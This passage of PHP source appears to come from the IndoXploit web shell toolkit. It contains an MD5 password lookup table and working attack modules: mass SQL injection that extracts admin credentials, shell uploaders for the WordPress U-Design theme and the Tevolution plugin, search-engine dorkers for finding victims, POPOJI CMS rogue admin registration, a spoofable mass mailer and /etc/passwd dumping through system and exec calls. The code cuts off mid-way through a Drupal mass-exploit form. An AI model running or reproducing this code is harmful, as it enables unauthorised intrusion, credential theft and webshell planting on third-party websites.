1616"e99a18c428cb38d5f260853678922e03" => "abc123",
1617"a152e841783914146e4bcd4f39100686" => "asdfgh",
1618"a384b6463fc216a5f8ecb6670f86456a" => "qwert",
1619"d8578edf8458ce06fbc5bb76a58c5ca4" => "qwerty",
1620"b59c67bf196a4758191e42f76670ceba" => "1111",
1621"96e79218965eb72c92a549dd5a330112" => "111111",
1622"4297f44b13955235245b2497399d7a93" => "123123",
1623"c33367701511b4f6020ec61ded352059" => "654321",
1624"81dc9bdb52d04dc20036dbd8313ed055" => "1234",
1625"e10adc3949ba59abbe56e057f20f883e" => "123456",
1626"fcea920f7412b5da7be0cf42b8c93759" => "1234567",
1627"25d55ad283aa400af464c76d713c07ad" => "12345678",
1628"25f9e794323b453885f5181f1b624d0b" => "123456789",
1629"e807f1fcf82d132f9bb018ca6738a19f" => "1234567890",
1630"befe9f8a14346e3e52c762f333395796" => "qawsed",
1631"76419c58730d9f35de7ac538c2fd6737" => "qazwsx",
1632"5f4dcc3b5aa765d61d8327deb882cf99" => "password",
1633"bed128365216c019988915ed3add75fb" => "passw0rd",
1634"21232f297a57a5a743894a0e4a801fc3" => "admin",
1635"e10adc3949ba59abbe56e057f20f883e" => "123456",
1636"5f4dcc3b5aa765d61d8327deb882cf99" => "password",
1637"25d55ad283aa400af464c76d713c07ad" => "12345678",
1638"f379eaf3c831b04de153469d1bec345e" => "666666",
1639"96e79218965eb72c92a549dd5a330112" => "111111",
1640"fcea920f7412b5da7be0cf42b8c93759" => "1234567",
1641"d8578edf8458ce06fbc5bb76a58c5ca4" => "qwerty",
1642"6f3cac6213ffceee27cc85414f458caa" => "siteadmin",
1643"200ceb26807d6bf99fd6f4f0d1ca54d4" => "administrator",
1644"63a9f0ea7bb98050796b649e85481845" => "root",
1645"4297f44b13955235245b2497399d7a93" => "123123",
1646"c8837b23ff8aaa8a2dde915473ce0991" => "123321",
1647"e807f1fcf82d132f9bb018ca6738a19f" => "1234567890",
1648"4ca7c5c27c2314eecc71f67501abb724" => "letmein123",
1649"cc03e747a6afbbcbf8be7668acfebee5" => "test123",
1650"62cc2d8b4bf2d8728120d052163a77df" => "demo123",
1651"32250170a0dca92d53ec9624f336ca24" => "pass123",
1652"46f94c8de14fb36680850768ff1b7f2a" => "123qwe",
1653"200820e3227815ed1756a6b531e7e0d2" => "qwe123",
1654"c33367701511b4f6020ec61ded352059" => "654321",
1655"f74a10e1d6b2f32a47b8bcb53dac5345" => "loveyou",
1656"172eee54aa664e9dd0536b063796e54e" => "adminadmin123",
1657"e924e336dcc4126334c852eb8fadd334" => "waskita1234",
1658"02631cc1d0cc5bda188566e90d0ae16c" => "rsamku2013",
1659"b69cbef044eac6fc514a2988e62c5b30" => "unlock08804",
1660"12e110a1b89da9b09a191f1f9b0a1398" => "nalaratih",
1661"f70d32432ff0a8984b5aadeb159f9db6" => "Much240316",
1662"a2fffa77aa0dde8cd4c416b5114eba21" => "gondola",
1663"2b45af95ce316ea4cffd2ce4093a2b83" => "w4nd3szaki",
1664"c5612a125d8613ddae79a6b36c8bee37" => "Reddevil#21",
1665"6e7fbe8e6147e2c430ce7e8ab883e533" => "R4nd0m?!",
1666"5136850b6c8f3ebc66122188347efda0" => "adminku",
1667"5214905fbe8d7f0bb0d0a328f08af3f0" => "adminpust4k4",
1668"acfc976c2d22e4a595a9ee6fc0d05f27" => "dikmen2016",
1669"dcdee606657b5f7d8b218badfeb22a90" => "masputradmin",
1670"ecb4208ee41389259a632d3a733c2786" => "741908",
1671"827ccb0eea8a706c4c34a16891f84e7b" => "12345",
1672"855be097acdf2fea4e342615a154ca3c" => "tolol",
1673"eeee80342778e7b497d507f89094b10d" => "master10",
1674"d29c0398602e6cf005f0dcb7a0443c7d" => "adminjalan",
1675"9062756924cf10763cc89cf2793a77ab" => "pass4@nd1",
1676"8b6bc5d8046c8466359d3ac43ce362ab" => "ganteng",
1677"528d06a172eb2d8fab4e93f33f3986a8" => "jasindolive",
1678"058fe7f85df1e992ef7bf948f1db7842" => "404J",
1679"abe1f4492f922a9111317ed7f7f8e723" => "bantarjati5",
1680);
1681$sites = explode("\r\n", htmlspecialchars($_POST['target']));
1682if(isset($_POST['go'])) {
1683 foreach($sites as $url) {
1684 if(!preg_match("/^http:\/\//", $url) AND !preg_match("/^https:\/\//", $url)) {
1685 $url = "http://$url";
1686 } else {
1687 $url = $url;
1688 }
1689 $statis = "";
1690 $sisa = "";
1691 $login = "";
1692 $param_list = array("statis","kategori","berita");
1693 $curl = ngcurl($url);
1694 $curl = str_replace("'", '"', $curl);
1695 foreach($param_list as $param) {
1696 preg_match_all("/$param-(.*?)\">/", $curl, $id);
1697 foreach($id[1] as $stat) {
1698 $pecah = explode("-", $stat);
1699 $statis .= $pecah[0];
1700 $sisa .= $pecah[1];
1701 break;
1702 }
1703 foreach($admin as $adminweb) {
1704 $curl_admin = ngcurl("$url/$adminweb");
1705 if(preg_match("/administrator|username|password/i", $curl_admin) AND !preg_match("/not found|forbidden|404|403|500/i", $curl_admin)) {
1706 $login .= "$url/$adminweb";
1707 break;
1708 }
1709 }
1710 $sql = ngcurl("$url/$param-$statis'/*!50000UniON*/+/*!50000SeLeCT*/+/*!50000cOnCAt*/(0x696e646f78706c6f6974,0x3c6c693e,username,0x20,password,0x3c6c693e)+from+users--+---+-$sisa");
1711 preg_match("/<meta name=\"description\" content=\"(.*?)\">/", $sql, $up);
1712 preg_match("/<li>(.*)<li>/", $up[1], $akun);
1713 $data = explode(" ", $akun[1]);
1714 echo "<center>[+] URL: $url\n<center>";
1715 //echo "[+] param: $param\n";
1716 if(htmlspecialchars($curl) !== htmlspecialchars($sql)) {
1717 if(preg_match("/indoxploit/", $sql)) {
1718 //echo "[ Injection Successfully ]\n";
1719 if($data[0] == "" || $data[1] == "") {
1720 echo "[+] Not Injected :(\n\n";
1721 break;
1722 } else {
1723 echo "[+] username: ".$data[0]."\n";
1724 $passwd = $real_pass[$data[1]];
1725 if($passwd == "") {
1726 $passwd = $data[1];
1727 simpen($data[1]);
1728 }
1729 echo "[+] password: $passwd\n";
1730 }
1731 if($login == "") {
1732 echo "[+] Login Admin ga ketemu :(\n\n";
1733 } else {
1734 echo "[+] Login: $login\n\n";
1735 }
1736 break;
1737 } else {
1738 echo "<center>[+] Not Injected :(\n\n</center>";
1739 break;
1740 }
1741 } else {
1742 echo "<center>[+] Not Injected :(\n\n</center>";
1743 break;
1744 }
1745 }
1746 }
1747}
1748}elseif($_GET['do'] == 'u-design_exploit'){
1749echo '
1750<html>
1751<center>
1752<h1>WordPress U-Design Themes Mass Xploiter</h1>
1753<form method="post" enctype="multipart/form-data">
1754Shellname: <br><input type="text" name="filename" style="width: 500px;" height="10" value="indoxploit.php" required><br>
1755Target: <br><textarea name="url" style="width: 500px; height: 200px;" placeholder="http://www.target.com/"></textarea><br>
1756<input type="submit" name="exp" value="Hajar!" style="width: 500px;">
1757</form>';
1758set_time_limit(0);
1759error_reporting(0);
1760
1761function buffer() {
1762 ob_flush();
1763 flush();
1764}
1765function curl($url, $payload) {
1766 $ch = curl_init();
1767 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1768 curl_setopt($ch, CURLOPT_URL, $url);
1769 curl_setopt($ch, CURLOPT_POST, true);
1770 curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
1771 curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
1772 curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
1773 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1774 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1775 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
1776 curl_setopt($ch, CURLOPT_HEADER, 0);
1777 curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
1778 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
1779 $res = curl_exec($ch);
1780 curl_close($ch);
1781 return $res;
1782}
1783function cek($url) {
1784 $ch = curl_init();
1785 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1786 curl_setopt($ch, CURLOPT_URL, $url);
1787 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
1788 $res = curl_exec($ch);
1789 curl_close($ch);
1790 return $res;
1791}
1792$file = htmlspecialchars($_POST['filename']);
1793$site = explode("\r\n", $_POST['url']);
1794$do = $_POST['exp'];
1795$uploader = base64_decode("PD9waHANCmVjaG8gIkluZG9YcGxvaXQgLSBBdXRvIFhwbG9pdGVyIFUtRGVzaWduIjsNCmVjaG8gIjxicj4iLnBocF91bmFtZSgpLiI8YnI+IjsNCmVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+DQo8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0naWR4Jz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPg0KPC9mb3JtPiI7DQppZigkX1BPU1RbJ3VwbG9hZCddKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snaWR4J11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2lkeCddWyduYW1lJ10pKSB7DQoJZWNobyAic3Vrc2VzIjsNCgl9IGVsc2Ugew0KCWVjaG8gImdhZ2FsIjsNCgl9DQp9DQo/Pg==");
1796if($do) {
1797 $idx_dir = mkdir("indoxploit_tools", 0755);
1798 $shell = "indoxploit_tools/".$file;
1799 $fopen = fopen($shell, "w");
1800 fwrite($fopen, $uploader);
1801 fclose($fopen);
1802 foreach($site as $url) {
1803 $target = $url.'/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php';
1804 $data = array(
1805 "Filedata" => "@$shell"
1806 );
1807 $curl = curl($target, $data);
1808 if($curl) {
1809 $cek = cek($url.'/'.$file);
1810 if(preg_match("/IndoXploit/i", $cek)) {
1811 echo "<a href='$url/$file' target='_blank'>$url/$file</a> -> shellmu<br>";
1812 }
1813 }
1814 buffer();
1815 }
1816}
1817}elseif($_GET['do'] == 'u-design_dorker'){
1818echo '
1819<html>
1820<form method="post">
1821<center>
1822<h1>WordPress U-Design Theme Mass Xploiter</h1>
1823Dork: <input type="text" name="dork" placeholder="inurl:/wp-content/themes/u-design" size="50" height="10">
1824<input type="submit" value="scan">
1825</center>
1826</form>
1827</html>';
1828class indoxploit {
1829 public $dork;
1830 public function google($dork, $page) {
1831 $kunAPI = "AIzaSyDYG1FME1N7meBZLcywY7VojMHmtUAUIzY";
1832 $dork = urlencode($dork);
1833 $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz=8&q={$dork}&key=$kunAPI&start={$page}";
1834 $output = json_decode($this->http_getx($url, true), true);
1835 if($output) {
1836 return $output;
1837 } else {
1838 return false;
1839 }
1840 }
1841 public function http_getx($url, $safemode = false) {
1842 if($safemode === true) sleep(1);
1843 $im = curl_init($url);
1844 curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
1845 curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
1846 curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
1847 curl_setopt($im, CURLOPT_HEADER, 0);
1848 return curl_exec($im);
1849 curl_close();
1850 }
1851 public function buffer() {
1852 ob_flush();
1853 flush();
1854 }
1855
1856}
1857$dorker = new indoxploit;
1858$dork = $dorker->dork = $_POST['dork'];
1859if(isset($dork)) {
1860 $data = $dorker->google($dork, "0");
1861 $dorker->buffer();
1862 if($data) {
1863 foreach($data['responseData']['cursor']['pages'] as $key => $data_page) {
1864 $data = $dorker->google($dork, $data_page['start']);
1865 foreach($data['responseData']['results'] as $key => $load_data) {
1866 if($_SESSION[$load_data['visibleUrl']]) {
1867 } else {
1868 $_SESSION[$load_data['visibleUrl']] = "1";
1869 $url = "http://".$load_data['visibleUrl']."/";
1870 echo $url."<br>";
1871 $dorker->buffer();
1872 }
1873 }
1874 }
1875 $dorker->buffer();
1876 } else {
1877 echo "google captcha.";
1878 }
1879}
1880}else if($_GET['do']=="binchecker"){
1881echo '
1882<style>
1883 #form{
1884 color:white;
1885 }
1886 #area{
1887 background-color:white;
1888 width:50%;
1889 margin-left:25%;
1890 }
1891</style>
1892<div id="form">
1893<form action="" method="post">
1894<p align="center">-= BIN CHECKER =-</p>
1895<section id="area">
1896<textarea style="margin: 0px;
1897 height: 129px;
1898 background-color: transparent;
1899 color: red;
1900 align:center;
1901 border: none;" name="binlist" placeholder="BIN CODE"></textarea><br>
1902</section><br>
1903 <center><input type="submit" name="shcbincheck" value="Check Bin"></center>
1904</form><pre>';
1905if($_POST['shcbincheck']){
1906echo "<hr>";
1907function singl3_j3mbut($j3m8u7){
1908 $amb1l_j3mbut = file_get_contents("http://www.binlist.net/json/$j3m8u7");
1909 $dec0d3_j3mbut = json_decode($amb1l_j3mbut,TRUE);
1910 return $dec0d3_j3mbut;
1911}
1912$x = explode("\r\n", $_POST['binlist']);
1913foreach ($x as $key => $value) {
1914 $dec0d3_j3mbut = singl3_j3mbut($value);
1915 if($dec0d3_j3mbut['bin']){
1916 echo "
1917 BIN INFO : <font color=red>".$dec0d3_j3mbut['bin']."</font>|
1918 <font color=yellow>".$dec0d3_j3mbut['bank']."</font>|
1919 <font color=blue>".$dec0d3_j3mbut['brand']."</font>|
1920 <font color=red>".$dec0d3_j3mbut['card_type']."</font>|
1921 <font color=green>".$dec0d3_j3mbut['country_name']."</font><br>";
1922 }
1923}
1924}echo'
1925</pre>
1926</div>';
1927}elseif($_GET['do'] == 'popoji_add_admin'){
1928echo '
1929<html>
1930<head>
1931<title>POPOJI CMS Add Admin Auto Registration</title>
1932<meta name="author" content="IndoXploit">
1933<style type="text/css">
1934html {
1935 margin: 20px auto;
1936 color: #ffffff;
1937}
1938header {
1939 color: lime;
1940 font-size: 35px;
1941 margin: 10px auto;
1942 text-align: center;
1943 text-decoration: underline;
1944}
1945input[type=text] {
1946 border: 1px solid #008000;
1947 color: #7FFFFF;
1948 width: 500px;
1949 height: 20px;
1950 padding-left: 5px;
1951 margin: 5px auto;
1952 background: transparent;
1953}
1954input[type=submit] {
1955 border: 1px solid #008000;
1956 color: #7FFFFF;
1957 background: transparent;
1958 width: 500px;
1959}
1960textarea {
1961 background: transparent;
1962 color: #7FFFFF;
1963 border: 1px solid #008000;
1964 resize: none;
1965 width: 500px;
1966 height: 250px;
1967 padding-left: 5px;
1968 margin: 5px auto;
1969}
1970a {
1971 text-decoration: none;
1972 color: lime;
1973}
1974a:hover {
1975 text-decoration: underline;
1976}
1977</style>
1978</head>';
1979set_time_limit(0);
1980error_reporting(0);
1981
1982function dav($url, $post=null) {
1983 $ch = curl_init();
1984 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
1985 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1986 curl_setopt($ch, CURLOPT_URL, $url);
1987 if($post != null) {
1988 curl_setopt($ch, CURLOPT_POST, true);
1989 curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1990 }
1991 curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
1992 curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
1993 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1994 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1995 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
1996 curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HHTP_USER_AGENT']);
1997 curl_setopt($ch, CURLOPT_HEADER, 0);
1998 return curl_exec($ch);
1999 curl_close($ch);
2000}
2001
2002$sites = explode("\r\n", $_POST['url']);
2003$user = "indoxploit";
2004$pass = $user;
2005$email = htmlspecialchars($_POST['email']);
2006if($_POST['hajar']) {
2007 echo "<span style='font-size: 25px; text-decoration: underline; color: lime; margin-bottom: 20px;'>Result Gannnnn</span><p>";
2008 if(!filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
2009 foreach($sites as $url) {
2010 if(!preg_match("/^http:\/\//", $url) AND !preg_match("/^https:\/\//", $url)) {
2011 $url = "http://".$url;
2012 } else {
2013 $url = $url;
2014 }
2015 echo "[+] Nyecan -> $url<br>";
2016 $post_register = array(
2017 "username" => $user,
2018 "email" => $email,
2019 "password" => $pass,
2020 "re-password" => $pass,
2021 );
2022 $register = dav("$url/po-admin/actregister.php", $post_register);
2023 echo "[+] Register ";
2024 if(!preg_match("/404|headers already sent|disabled for security reasons|Please type another email!/", $register) AND preg_match("/SUCCESS!!!|>Check your email for next step. Thank you!/", $register)) {
2025 echo "<font color=lime>OK!</font><br>";
2026 echo "[+] <font color=gold>Cek emailmu buat aktivasi</font><br>";
2027 echo "[+] u/p: <font color=lime>$user</font><br><br>";
2028 $post_login = array(
2029 "username" => $user,
2030 "password" => $pass,
2031 );
2032 } else {
2033 echo "<font color=red>Gagal!</font><br><br>";
2034 }
2035 }
2036 } else {
2037 echo "<font color=red>Emailmu ga valid bosss, email harus valid biar bisa masuk token registrasinyaa.</font>";
2038 }
2039} else {
2040echo '
2041<center>
2042<header>POPOJI Auto Registration</header>
2043<form method="post">
2044Email: <br>
2045<input type="text" name="email" placeholder="email@asu.com" required><br>
2046Domains: <br>
2047<textarea name="url" placeholder="http://www.target.com"></textarea><br>
2048<input type="submit" name="hajar" value="Xploit!">
2049</form>
2050</center>';
2051}
2052}elseif($_GET['do'] == 'tevolution'){
2053echo '
2054<html>
2055<center>
2056<h1><strong>Tevolution Mass Upload Shell</strong></h1>
2057<form method="post" enctype="multipart/form-data">
2058Shellname: <br><input type="text" name="filename" style="width: 500px;" height="10" value="indoxploit.php.xxxjpg" required><br>
2059Target: <br><textarea name="url" style="width: 500px; height: 200px;" placeholder="http://www.target.com/"></textarea><br>
2060<input type="submit" name="exp" value="Hajar!" style="width: 500px;">
2061</form>';
2062set_time_limit(0);
2063error_reporting(0);
2064
2065function buffer() {
2066 ob_flush();
2067 flush();
2068}
2069function curl($url, $payload) {
2070 $ch = curl_init();
2071 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
2072 curl_setopt($ch, CURLOPT_URL, $url);
2073 curl_setopt($ch, CURLOPT_POST, true);
2074 curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
2075 curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
2076 curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
2077 curl_setopt($ch, CURLOPT_COOKIESESSION, true);
2078 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
2079 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
2080 curl_setopt($ch, CURLOPT_HEADER, 0);
2081 curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
2082 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
2083 $res = curl_exec($ch);
2084 curl_close($ch);
2085 return $res;
2086}
2087$file = htmlspecialchars($_POST['filename']);
2088$site = explode("\r\n", $_POST['url']);
2089$do = $_POST['exp'];
2090$uploader = base64_decode("PD9waHANCmVjaG8gIkluZG9YcGxvaXQgLSBBdXRvIFhwbG9pdGVyIjsNCmVjaG8gIjxicj4iLnBocF91bmFtZSgpLiI8YnI+IjsNCmVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+DQo8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0naWR4Jz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPg0KPC9mb3JtPiI7DQppZigkX1BPU1RbJ3VwbG9hZCddKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snaWR4J11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2lkeCddWyduYW1lJ10pKSB7DQoJZWNobyAic3Vrc2VzIjsNCgl9IGVsc2Ugew0KCWVjaG8gImdhZ2FsIjsNCgl9DQp9DQo/Pg==");
2091if($do) {
2092 $y = date("Y");
2093 $m = date("m");
2094 $idx_dir = mkdir("indoxploit_tools", 0755);
2095 $shell = "indoxploit_tools/".$file;
2096 $fopen = fopen($shell, "w");
2097 fwrite($fopen, $uploader);
2098 fclose($fopen);
2099 foreach($site as $url) {
2100 $target = $url.'/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php';
2101 $cek_shell = "$url/wp-content/uploads/$y/$m/$file";
2102 $data = array(
2103 "Filedata" => "@$shell"
2104 );
2105 $curl = curl($target, $data);
2106 if($curl) {
2107 $cek = file_get_contents($cek_shell);
2108 if(preg_match("/IndoXploit - Auto Xploiter/is", $cek)) {
2109 echo "<a href='$cek_shell' target='_blank'>$cek_shell</a> -> shellmu<br>";
2110 }
2111 }
2112 buffer();
2113 }
2114}
2115}elseif($_GET['do'] == 'sqli_scanner'){
2116function cover() {
2117 print "<center>";
2118 print " ****** SQL Scanner via Bing Dorker ******<br><br>";
2119 print " ***** Coded by l0c4lh34rtz - IndoXploit *****<br><br>";
2120 print " **** Sanjungan Jiwa - Jancok Sec - Res7ock Crew ****<br><br>";
2121 print "</center>";
2122}
2123cover();
2124echo '<center>
2125<form method="post" action="">
2126 Dork: <input type="text" name="dork" placeholder=\'"page.php?id=1" site:it\' style="width: 300px; height: 25px;">
2127 <input type="submit" value=">>" name="submit">
2128</form>
2129 </center>';
2130$dork = htmlspecialchars($_POST['dork']);
2131$do = urlencode($dork);
2132if(isset($_POST['submit'])) {
2133 $npage = 1;
2134 $npages = 30000;
2135 $allLinks = array();
2136 $lll = array();
2137 while($npage <= $npages) {
2138 $x = getsource("http://www.bing.com/search?q=".$do."&first=".$npage);
2139 if($x) {
2140 preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
2141 foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
2142 $npage = $npage + 10;
2143 if (preg_match("(first=" . $npage . "&)siU", $x, $linksuiv) == 0) break;
2144 } else break;
2145 }
2146 foreach($allLinks as $url) {
2147 $urls = parse_url($url, PHP_URL_HOST);
2148 $urls = "http://$urls/";
2149 if($_SESSION[$urls]) {
2150 //
2151 } else {
2152 $_SESSION[$urls] = "1";
2153 if(inject($url)) {
2154 echo " $url -> Vuln!!<br>";
2155 simpen($url);
2156 }
2157 }
2158 }
2159}
2160$error[] = 'You have an error in your SQL';
2161$error[] = 'supplied argument is not a valid MySQL result resource in';
2162$error[] = 'Division by zero in';
2163$error[] = 'Call to a member function';
2164$error[] = 'Microsoft JET Database';
2165$error[] = 'ODBC Microsoft Access Driver';
2166$error[] = 'Microsoft OLE DB Provider for SQL Server';
2167$error[] = 'Unclosed quotation mark';
2168$error[] = 'Microsoft OLE DB Provider for Oracle';
2169$error[] = 'Incorrect syntax near';
2170$error[] = 'SQL query failed';
2171$error[] = 'Warning: filesize()';
2172$error[] = 'Warning: preg_match()';
2173$error[] = 'Warning: array_merge()';
2174$error[] = 'Warning: mysql_query()';
2175$error[] = 'Warning: mysql_num_rows()';
2176$error[] = 'Warning: session_start()';
2177$error[] = 'Warning: getimagesize()';
2178$error[] = 'Warning: mysql_fetch_array()';
2179$error[] = 'Warning: mysql_fetch_assoc()';
2180$error[] = 'Warning: is_writable()';
2181$error[] = 'Warning: Unknown()';
2182$error[] = 'Warning: mysql_result()';
2183$error[] = 'Warning: pg_exec()';
2184$error[] = 'Warning: require()';
2185
2186function getsource($url) {
2187 $curl = curl_init($url);
2188 curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
2189 $content = curl_exec($curl);
2190 curl_close($curl);
2191 return $content;
2192}
2193function inject($url) {
2194 $data = getsource(str_replace("=", "='", $url));
2195 $errors = implode("|", $GLOBALS['error']);
2196 return preg_match("#{$errors}#i", $data);
2197}
2198function simpen($isi) {
2199 $f = fopen("result_sql.txt","a+");
2200 fwrite($f, "$isi<br>");
2201 fclose($f);
2202}
2203}elseif($_GET['do'] == 'mass_mail'){
2204if(isset($_POST['send'])){ $email = $_POST['email'];$subject = $_POST['subject'];$from = $_POST['fromEmail'];$message = $_POST['message'];if($email&&$subject&&$from&&$message){$emails = explode(";", $email);foreach($emails as $email){mail($email, $subject, $message, "From: ".$from); }}}
2205echo '
2206<center><strong>Mass Mailer</strong></center>
2207<center><p>Selamat Menggunakan Ndan ^_^</p></center>
2208<form action="" method="post">
2209 <table align="center">
2210 <tr>
2211 <td>To Email(s) : </td>
2212 <td><input type="text" style="background-color:#010101;color:#7FFFFF;border:1px solid #7FFFFF;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px; width:220px;" name="email" placeholder="email@address.com" />
2213 </tr>
2214 <tr>
2215 <td>Subject : </td>
2216 <td>
2217 <input type="text" style="background-color:#010101;color:#7FFFFF;border:1px solid #7FFFFF;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px;width:220px" name="subject" />
2218 </td>
2219 </tr>
2220 <tr><td>From Email : </td><td><input type="email" style="background-color:#010101;color:#7FFFFF;border:1px solid #7FFFFF;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px;width:220px;" name="fromEmail" placeholder="example@google.com" /></td>
2221 </tr>
2222 <tr><td>Message : </td><td></td></tr>
2223 </table>
2224 <table align="center">
2225 <tr><td>
2226 <textarea style="background-color:#010101;color:#7FFFFF;border:1px solid #7FFFFF;outline:none;font-size:11px;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;padding:2px 3px;margin:0 0 0 -1px; height:200px;width:290px;" name="message"></textarea>
2227 </td></tr>
2228 <tr><td><input type="submit" name="send" value="Send Message(s)" /></td></tr>
2229 </table>
2230</form>';
2231}elseif($_GET['do'] == 'etcpler'){
2232 echo "<center>Bypass etc/passw With:<br>
2233<table style='width:50%' align='center'>
2234 <tr>
2235 <td><form method='post'><input type='submit' value='System Function' name='syst'></form></td>
2236 <td><form method='post'><input type='submit' value='Passthru Function' name='passth'></form></td>
2237 <td><form method='post'><input type='submit' value='Exec Function' name='ex'></form></td>
2238 <td><form method='post'><input type='submit' value='Shell_exec Function' name='shex'></form></td>
2239 <td><form method='post'><input type='submit' value='Posix_getpwuid Function' name='melex'></form></td>
2240</tr></table><center>Bypass User With : <table style='width:50%' align='center'>
2241<tr>
2242 <td><form method='post'><input type='submit' value='Awk Program' name='awkuser'></form></td>
2243 <td><form method='post'><input type='submit' value='System Function' name='systuser'></form></td>
2244 <td><form method='post'><input type='submit' value='Passthru Function' name='passthuser'></form></td>
2245 <td><form method='post'><input type='submit' value='Exec Function' name='exuser'></form></td>
2246 <td><form method='post'><input type='submit' value='Shell_exec Function' name='shexuser'></form></td>
2247</tr>
2248</table></center><br>";
2249 if ($_POST['awkuser']) {
2250echo"<textarea class='inputzbut' cols='65' rows='15'>";
2251echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
2252echo "</textarea><br>";
2253}
2254if ($_POST['systuser']) {
2255echo"<textarea class='inputzbut' cols='65' rows='15'>";
2256echo system("ls /var/mail");
2257echo "</textarea><br>";
2258}
2259if ($_POST['passthuser']) {
2260echo"<textarea class='inputzbut' cols='65' rows='15'>";
2261echo passthru("ls /var/mail");
2262echo "</textarea><br>";
2263}
2264if ($_POST['exuser']) {
2265echo"<textarea class='inputzbut' cols='65' rows='15'>";
2266echo exec("ls /var/mail");
2267echo "</textarea><br>";
2268}
2269if ($_POST['shexuser']) {
2270echo"<textarea class='inputzbut' cols='65' rows='15'>";
2271echo shell_exec("ls /var/mail");
2272echo "</textarea><br>";
2273}
2274if($_POST['syst'])
2275{
2276echo"<textarea class='inputz' cols='65' rows='15'>";
2277echo system("cat /etc/passwd");
2278echo"</textarea><br><br><b></b><br>";
2279}
2280if($_POST['passth'])
2281{
2282echo"<textarea class='inputz' cols='65' rows='15'>";
2283echo passthru("cat /etc/passwd");
2284echo"</textarea><br><br><b></b><br>";
2285}
2286if($_POST['ex'])
2287{
2288echo"<textarea class='inputz' cols='65' rows='15'>";
2289echo exec("cat /etc/passwd");
2290echo"</textarea><br><br><b></b><br>";
2291}
2292if($_POST['shex'])
2293{
2294echo"<textarea class='inputz' cols='65' rows='15'>";
2295echo shell_exec("cat /etc/passwd");
2296echo"</textarea><br><br><b></b><br>";
2297}
2298echo '<center>';
2299if($_POST['melex'])
2300{
2301echo"<textarea class='inputz' cols='65' rows='15'>";
2302for($uid=0;$uid<60000;$uid++){
2303$ara = posix_getpwuid($uid);
2304if (!empty($ara)) {
2305while (list ($key, $val) = each($ara)){
2306print "$val:";
2307}
2308print "\n";
2309}
2310}
2311echo"</textarea><br><br>";
2312}
2313}elseif($_GET['do'] == 'drupal') {
2314echo ' <!Doctype HTML>
2315<html>
2316<head>
2317 <title>Drupal Exploit</title>
2318 <style type="text/css">
2319 .mymargin{
2320 margin-top:30px;
2321 font-family: monospace;
2322 }
2323 body, html {
2324 text-align: center;
2325 color: #008000;
2326 margin: 10px auto;
2327 }
2328 a {
2329 color: lime;
2330 text-decoration: none;
2331}
2332 </style>
2333</head>
2334<body>
2335<h6>Drupal Mass Xploiter</h6>
2336<center>
2337 <div class="mymargin">
2338 <center>
2339 <form method="POST" action="">
2340 <font color="#008000">Target :</font> <br>
2341 <textarea name="url" placeholder="Example: www.site.com" style="resize: none; border: 1px solid green; color: #bb0000; background: transparent; margin: 5px auto; padding-left: 5px; width: 500px; height: 250px;"></textarea><br>
